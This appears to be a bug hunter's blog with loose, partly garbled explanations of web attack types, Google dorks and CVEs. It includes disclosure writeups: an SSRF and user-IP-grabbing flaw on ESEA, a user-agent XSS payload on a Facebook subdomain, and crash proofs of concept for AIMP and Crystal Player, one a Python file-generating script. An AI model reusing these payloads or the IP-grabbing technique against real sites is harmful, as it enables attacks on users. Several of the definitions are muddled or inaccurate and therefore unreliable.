PlayTime - Get More Information A Cyber Game

PlayTime

Its playtime to get more information a cyber play time!

Playstimes will give a time to quickly learn the fundamental of information security. As it stand on internet as security thread to find those thread playtime will help you to secure your product or privacy from unauthentic access. Just see one of the most interesting topic.

Get your world be secure from cyber attack as quickly as possible. 

PlayTime Cyber Information

These are the top most topic of cyber attack

• SQL Injection - Data Base Injection is one of most finding vulnerability on many insecure interface. It is work on data flaw and can be find in any product which need to interact with database so called DBMS (Data Base Management System).

• Authentication and Session Management - Authentication is mostly used in every field. Login method may not be the most secure way to get access on private content, to secure login method we always take most method as an excuse to secure the login like session authentication.

• Cross Site Scripting And XSS - XSS may not be harmful if admin will do it on there product. But if attacker can find that mistake, even the admin or authorized people can compromise there privacy.

• Direct Object Reference - Direct Object Reference is use as easy for people get the ice cream in there hand. Today's mostly non aware client will take the offer and used the product which is directly accessible.

• Cross Site Request Forgery (CSRF) - CSRF authorized the login and make the session a valid session. There is many example which give the attacker to get access by session.

• Redirection - Redirection is the most harmful attack. Redirection itself cyber attack but when attacker make you read unauthorized data or harmful data will give you a Virus, Trojan and Backdoor.

• Data Exposure - Data content which is not even developer intend to disclose can be accessible and attacker can gain the advantage of that configure data.

Google Dork

A way to find thing more specific in Google search engine. Also a vulnerability detection method to those who have vulnerable  resources in there systems and web applications. Most of google dork are used to find those vulnerabilities for security and unauthorized resources. I will include both topics to use google dork as find vulnerabilities for security in your system and for vulnerability detection.

Use of google dork :

Google Dork

Basic of google search engine query are - the title of the page you have to find, second comes a url of the page and third comes a text or content of the page found in the result of google index. These all have a specific terms to use as SQL injection or we can say sql query to get our result out in the google search index more accurately. Most of time you can find google hacks in web, these words are just a exception to get more focus. Now as you know that google hack are not but just a query like SQL to find our result more accurately.

If you search keyword just game google search game in all title, url and text and even a image if query will found. So to specify these terms we can gave the exact query to find our result.

Lets begin with the title keyword which used for title searched in google index as the word mean is title it will show all result which must have the title game in there page. So to get that result we use keyword "intitle" without double quote with suffix colon ( : ) symbol.

Example Dork :
intitle:game

Note :-
The query will not consider to exclude game word from non title syntax like url and text or content.

Intitle Time

To understand the logic more specific we use arithmetic logic in google query. To do that we take negative a (-) minus symbol in use. It use for exclude the keyword which we not want in the result of google search. Lets take a example of time keyword. if you search in google it will show you current time, lets exclude the 2016 search in the result and the result will be -

Example Dork :
intitle:time -2016

CVE Reports A Vulnerability Detection

CVE reports is publicly identified types of vulnerability found in systems and internet. These vulnerability found in system are categorized in different different topics, these topics have lots of method to found in one of many systems, software and web applications. This method is what can be identified uniquely.

CVE Reports

CVE reports are publicly available and can be found by CVE code like "CVE IDs," "CVE entries," "CVE names," "CVE numbers," and "CVEs" which is from four or more numbers. These numbers are unique and commonly identified anywhere in the internet. As cyber security vulnerabilities, it is identified like "CVE-1999-0067", "CVE-2000-1205", "CVE-2016-1234".

CVE is used from 1999 on that time there is no easy way identification to find out if the vulnerability are same or not based on the different status of reports found in local servers or in personal used database. This result in many problems like differences between id numbers found in different database.

Exploit Offencive Security

Exploit!

What do you think about exploit?

Exploit a term of direct use of resource! A thread of program to have direct benefit of resource. In offense of security of a program or software which have a dynamic or uncontrollable flaw can be exploit, which give a term of resource access by unidentified program.

Exploit is a piece of code which can not be detected by security program, It behave with program like there own code. These code or program have there flaw to work. Exploit is just use that flaw to fit and access what is its program for. Right now there is widely used programming languages for both web or non web programs like C, Dot Net(.Net), php, asp, java, html, xml etc. 

Is programming language is secure from exploit?

Exploit is not ask for programming language, It just depend on programmer. Program which use dynamic flaw can be exploited, there is no exception in programming language. Because today most program are used for dynamic concept where program take input on run time or want changes in there program as without following all process from the start. 

Note :

If you are a beginner and you don't know the dynamic concept than you may not understand about exploit and security.

What exploit can do?

Exploit is just a word or command which is not need to ask for permission. So exploit term itself is offensive to use. For security reason you should have known the program and its language to check if your program can be exploit or not. 

SSRF and User IP Address Grabbing Vulnerability in ESEA [Web]

Greetings Reader, Here I come up with another interesting article / blog post about the vulnerability that I found on ESEA (https://play.esea.net) almost a month before. Where a web app functionality causing two critical vulnerabilities SSRF (Server Site Request Forgery) and other one that can allow attacker to grab IP address of any user. However both the issues are different and reported different but causing by same functionality. This one is interested finding so I made up my mind to write up about this issue. So lets begin-

Vulnerable Domain - https://play.esea.net

Vulnerability Name - SSRF and Grabbing users IP address

About Target Domain - E-Sports Entertainment Association League (ESEA) is an esports competitive video gaming community founded by E-Sports Entertainment Association (ESEA). It is widely known for their anti-cheat software. ESEA features a system that allows players of all levels to play matches with others.

ESEA provide guestbook to every user where other users can post (comment) anything only if it is unlocked and same commenting functionality provided on forum posts, news posts and user's account (guestbook). This is where the issue occurs. If user posted any link/URL that contains an image such as http://example.com/image.jpg then moving mouse on that link shows the thumbnail of that image. For example user posted a link in comment such as http://site.com/rat.jpg then move your mouse on the link that you posted, will shows a small thumbnail on ESEA website. This is happening because the link automatically executing in case of creating a thumbnail of image.

So another question may arise, why they required such functionality? Initially ESEA allows to post video (gameplay) from YouTube for some contests. So this functionality shows the thumbnail  from YouTube video and later I noticed, it is working on image URL as well.

As I confirmed the image URL executing automatically so this is the perfect place to test SSRF. That mean If http://sitename.com:80/image.jpg shows the thumbnail in the guestbook by moving mouse on it then site as http/80 port is open. But if we found it closed ports like http://sitename.com:32564/image.jpg, as port is closed the output will not be displayed.

    http://sitename.com:80/image.jpg=> It gives an output (Port 80 is open)
    http://sitename.com:32564/image.jpg => No output (Port 32564 is closed)

As you can check in below image, FTP port 21 automatically executing. It doesn't sanitizing the input. 

So after formalities and procedure they verified and resolved this vulnerability and later stage port number filtered and doesn't executing anymore. And I got reward $500 for this bug + 500 ESEA points + Profile badge.

But but... One thing left

After fixing SSRF, I noticed that the URL still executing only with HTTP and HTTPS and the thumbnail still appears so I thought to use GIF image to grab user's information. So I crafted a GIF to grab user's information such as IP address, user agent then pasted the link on guestbook. Next time when I refreshed the page, I found the GIF image URL successfully executed that mean it created a log into log file. Later I tried to use http://iplogger.org/ to easy my task and it perfectly worked.

This vulnerability is pretty simple with critical severity and allowed me to grab information of user from guestbook, forums and news. Suppose in case of grabbing users information you just need to paste it where the most of users visit frequently such as latest news section, latest forum posts or if you want to target any particular user then all you have to do is to paste the link in victims guestbook so whenever the user visit his/her guestbook will be a victim.

First they rewarded me $500 for this bug + 500 ESEA points + Profile badge.

but later they increased the payout to $750 -

After submitting this issue they fixed as soon as possible. And I'm glad to work with them. They are really dedicated toward work and try to reply as fast they can. I have hunted more bugs such as CSRF that worth $1000 and other logical issues.

Unpatched Facebook User-Agent Cross Site Scirpting Vulnerability [Web]

Greetings readers, I found a one of critical bug on investor[dot]fb[dot]com, However the risk severity is medium and hard to exploit remotely but still it is a security bug. Yes!! I'm talking about user-agent header cross site scripting vulnerability on one of subdomain of fb.com. As a information security researcher and whitehat mindset, I reported it to Facebook so that they can fix this issue but in response I found this is not a issue for them and finally I asked to him to make a writeup on this bug and all seems they don't care about it.

Whatever, let me explain this bug. As all of you know, browser always sent user-agent with HTTP request and user can change user-agent by intercepting the request or via some plugins but I'm fan of "Tamper Data" - a Firefox plugin that allow user to intercept request easily.

When I was trying to find some bugs on investor.fb.com, I found a link investor.fb.com/alerts.cfm that contains a form with some checkboxes and can use POST method. First of all I tick on checkbox and submit the data by clicking continue button, at same time I intercepted the request and make some changes in value of checkbox i.e. doublequote and get this error message -

If you look at this error message, you will notice it contains the User-Agent. So suddenly a thing stuck on my mind and I modified user-agent to XSS Payload. After that XSS Payload i.e. User-Agent:<img src=x onerror=prompt(document.domain);> will take place of user-agent and popup a javascript prompt. 

Now let's discuss about risk severity and vulnerability of XSS in user-agent. This kind of bug is not easy to exploit remotely though some advanced method allow to exploit this vulnerability otherwise this will be self-xss. In normal cases, only client can execute this kind of bug on their system but I think nobody, even a newbie will not going to change user-agent for you. Then I found a very informative article on internet that shows the fabulous way of triggering user-agent XSS. - http://websecurity.com.ua/5195/

Status: Reported [Unpatched]
Disclaimer: This article is only for education and knowledge purpose only.

AIMP v3.60.1470 - Denial of Service [Crash]

 

# Exploit Title: [AIMP v3.60.1470 - Denial of Service]
# Date: [23/01/2015]
# Exploit Author: [Kapil Soni (Haxinos)]
# Twitter: @Haxinos
# Vendor Homepage: [http://www.aimp.ru/]
# Software Link: [https://drive.google.com/file/d/0B0hkLvGZtoWUcGl5R21LQTZYaHM/view?usp=sharing]
# Version: [AIMP 3.60.1470]
# Tested on: [Windows XP SP2]


Product Information:
=========================

    **Multi-format Playback:
    ------------------------
    .CDA, .AAC, .AC3, .APE, .DTS, .FLAC, .IT, .MIDI, .MO3, .MOD, .M4A, .M4B, .MP1, .MP2, .MP3,
    .MPC, .MTM, .OFR, .OGG, .OPUS, .RMI, .S3M, .SPX, .TAK, .TTA, .UMX, .WAV, .WMA, .WV, .XM

    **Output supports
    ------------------
    DirectSound / ASIO / WASAPI / WASAPI Exclusive

    **18-band equalizer and built-in sound effects
    ----------------------------------------------
    Reverb, Flanger, Chorus, Pitch, Tempo, Echo, Speed, Bass, Enhancer, Voice Remover
    32-bit audio processing
    For the best quality!

    **Work with multiple playlists
    ------------------------------
    While one plays - you work with another
    Internet radio
    Listen internet-radio stations in OGG / WAV / MP3 / AAC / AAC+ formats
    Capture stream to APE, FLAC, OGG, WAV, WV, WMA and MP3 formats
    Capture stream as is for MP3 / AAC / AAC+ formats

    Work with few playlists:
    -------------------------
    Personal appearance settings of even playlist
    Ability to block content from changes
    Ability to synchronize playlist content with folder or another playlist

    Multithreading encoding
    -----------------------
    Few encoding modes
    Single source - single result / All sources - single result (with ability to generate CUE Sheet)
    Encode to popular formats
    Encode to APE, MP3, FLAC, OGG, WAV, WMA, MusePack and WavPack formats

    Audio CD Grabber
    ----------------
    Allow you to import audio data from Audio CD
    An ability to change format of input audio stream?
    Shut down the computer after conversion operation

    Audio Library
    --------------
    Represents the music files organizer, which allows you easily organize your music, set marks for listened Tracks, keeping playback statistics.


    Alarm Clock
    -----------
    You can choose playback start time of selected track with smooth volume increasing.
    Wake up the computer from sleeping mode is supported.

    Auto shutdown the computer
    ---------------------------
    You can sleep while listening favorite music, just set the timer to shutdown the computer at given time or on playback finish.



Debugging & Error Logs:
========================
(7d8.1fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=024a2340 ebx=00420070 ecx=00410041 edx=00410041 esi=02492310 edi=004186e4
eip=00577e73 esp=0012fbe0 ebp=0012fc54 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\AIMP3\AIMP.Runtime.dll -
AIMP_Runtime!SystemAtomicXchgInt64$qqrrjj+0x407:
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\AIMP3\AIMP3.exe
00577e73 8911            mov     dword ptr [ecx],edx  ds:0023:00410041=004101c9
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.


Steps for Reproduce (Access Violation):
==========================
1) Open AIMP Player and rename the playlist or press ALT+R
2) put "A" - 40000 times or more and click on OK.
3) Now press cntrl+s for save playlist, and application got crashed.

Exploitation Technique:
=======================
Local (Overflow, Crash PoC)

Status:
==========
Reported

Author:
=======
Kapil Soni (@Haxinos)

Crystal Player 1.99 - Memory Corruption Vulnerability [Local]

# Exploit Title: [Crystal Player 1.99 - Memory Corruption Vulnerability]
# Date: [21/01/2015]
# Exploit Author: [Kapil Soni]
# Twitter: [@Haxinos]
# Vendor Homepage: [http://www.crystalplayer.com]
# Software Link: [download link if available]
# Version: [Crystal Player v1.99]
# Tested on: [Windows XP SP2]

'''
Affected Product(s):
#====================
Crystal Player 1.99


Exploitation Technique:
#=======================
Local


Severity Level:
#===============
Medium


Technical Details & Description:
================================
A Memory Corruption Vulnerability is detected on Crystal Player 1.99. An attacker can crash the software by using .mls file.
Attackers can crash the software local by user inter action over mls (playlist).



--- DEBUG LOG ---
///registers
EAX 00000000
ECX 0006FE24
EDX 0006FE24
EBX 0013014C
ESP 0006F300
EBP 00060041
ESI 00FF4A00
EDI 00000001
EIP 0040F933 Crystal.0040F933
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 1  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 1  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00010296 (NO,NB,NE,A,S,PE,L,LE)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1



--- ERROR LOG ---
Crystal+0xf933:
0040f933 8b5510          mov     edx,dword ptr [ebp+10h] ss:0023:00060051=????????


00060051 doesnt exist in the program aka not allowed .. so memcopy fails...


EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0040f933 (Crystal+0xf933)

Access violation when reading [00060051]

Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by local attackers with userinteraction ...
'''
#!/usr/bin/python

buffer = "A"*30000

filename = "Crash"+".mls"
file = open(filename, 'w')
file.write(buffer)
file.close()
print "[] Successfully MLS Created []"

'''
How to perform:
=======================
1) Open Immunity Debugger and attach Crystal Player 1.99
2) Run it, Now move .mls file that we generated by our python script to the player
3) Once again you have to move the same file in Crystal Player 1.99 for adding second playlist.

When you perform above steps so application will crash. Analyze it on Immunity.

Solution - Fix & Patch:
=======================
Restrict working maximum size & set a own exception-handling for over-sized requests.

Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of the local crash method.

Other Links:
=============
1) Exploit-DB - https://www.exploit-db.com/exploits/35869/
2) Google it

Status:
========
Reported

Authors:
==================
Kapil Soni (Haxinos)
'''